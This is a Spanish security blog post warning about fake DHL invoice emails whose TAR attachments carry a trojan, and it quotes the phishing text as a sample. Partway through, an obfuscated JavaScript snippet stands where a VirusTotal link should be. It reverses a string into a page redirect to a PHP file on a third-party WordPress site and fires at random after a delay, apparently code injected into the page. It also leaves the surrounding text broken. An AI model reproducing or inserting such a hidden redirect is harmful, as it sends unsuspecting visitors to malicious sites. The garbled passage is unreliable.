NUEVOS MAILS PRESUNTAMENTE DE DHL QUE ANEXAN FICHEROS EMPAQUETADOS CON EL MISMO MALWARE

Nos llegan dos mails con el siguiente texto:TEXTO:

 

_____________

Asunto: Factura DHL : A0342346
De: e-billing.es@dhl.com
Fecha: 31/10/2018 13:26
Para: billing@dhl.com

ESTE ES UN MENSAJE AUTOMÁTICO, POR FAVOR NO CONTESTE

Estimado Cliente,

Por favor vea su factura adjuntada en formato PDF, con fecha 31/10/2018 y un archivo .csv para envíos y servicios suministrados por DP DHL.

Si desea descargar su factura en un formato diferente, haga click aquí y vaya a la página web facturación electronica DHL. También puede consultar la información de su cuenta y el historial de facturas on-line aquí.

En el caso de que haya algún problema al abrir el documento adjuntado contacte al equipo de facturación electronica en en el teléfono 902180780 para ayuda.

Si desea verificar la firma digital de esta factura, haga click aquí para dirigirse a la página web de facturación electrónica y vaya a la sección de Preguntas Más Frecuentes para instrucciones.

Para todas las solicitudes relacionadas con el contenido de las facturas, por favor contacte: 902 12 24 24.

Esperamos recibir el pago en su momento, y dentro de los términos acordados establecidos en su factura.

Nos gustaría agradecerle que haya utilizado los servicios de DP DHL.

Le saluda atentamente,

El equipo de facturación electrónica de DHL

 

Haga click aquí para descargar Adobe Acrobat Reader> http://www.adobe.com/go/getreader

_______________

ANEXADOS SENDOS FICHEROS EMPAQUETADOS:

PDF_A0342346.TAR

CSV_A0342346.TAR

El CSV… $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/es/file/0034bb0a2b90c457de6f24e3154857f064ad5c2daa22e32207853fad66970f74/analysis/1540990448/” target=”_blank” rel=”noopener”>con similar preanalisis de virustotal, siendo el del TAR el siguiente:

Dicho EXE lo pasamos a controlar a partir del ELISTARA 40.02 de hoy, como TROJAN DELPEN

saludos

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies